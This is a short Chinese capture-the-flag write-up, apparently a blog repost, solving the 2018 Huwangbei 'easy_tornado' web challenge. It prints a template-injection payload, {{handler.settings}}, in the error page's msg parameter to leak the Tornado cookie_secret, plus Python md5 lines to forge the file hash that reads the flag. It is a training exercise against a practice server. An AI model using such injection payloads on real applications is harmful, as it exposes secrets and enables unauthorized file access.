护网杯 2018-WEB-easy_tornado 1

作者: le3f | 来源:发表于2020-04-05 12:03 被阅读0次

护网杯 2018-WEB-easy_tornado 1
[护网杯] writeup
2019护网杯_pwn
护网杯_2018_huwang
web-ssti
[护网杯 2018]easy_tornado
[护网杯 2018]easy_tornado
【护网杯】Web部分相关知识点
2018年10月护网杯 WriteUp
2019-护网杯-pwn-mergeheap

漏洞复现地址
https://buuoj.cn/challenges#[护网杯%202018]easy_tornado

考察点：服务端模板注入（ssti攻击）

打开存在三个文件

image.png

查看flag.txt ，flag所在文件/flllllllllllag,文件名+filehash都到文件

image.png

welcome.txt中存在render
render为python渲染函数
https://cn.vuejs.org/v2/guide/render-function.html

hint文件中提示filehash为cookie_secret+md5的filename组成

image.png

filename改为fllllllllllg时报错error页面存在模板注入

image.png
找到cookie_secret
http://21f57b78-60e0-4b5d-9a1c-adc9e1e8505c.node3.buuoj.cn/error?msg={{handler.settings}}

image.png

md5加密

print(hashlib.md5(b'/fllllllllllllag').hexdigest())
print(hashlib.md5(b'cb86f54f-3513-4eae-b6fb-587d2e82082e3bf9f6cf685a6dd8defadabfb41a03a1').hexdigest())

image.png

网友评论

本文标题：护网杯 2018-WEB-easy_tornado 1

本文链接：https://www.haomeiwen.com/subject/xhxuphtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

护网杯 2018-WEB-easy_tornado 1

相关文章

护网杯 2018-WEB-easy_tornado 1

[护网杯] writeup

2019护网杯_pwn

护网杯_2018_huwang

web-ssti

[护网杯 2018]easy_tornado

[护网杯 2018]easy_tornado

【护网杯】Web部分相关知识点

2018年10月护网杯 WriteUp

2019-护网杯-pwn-mergeheap

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读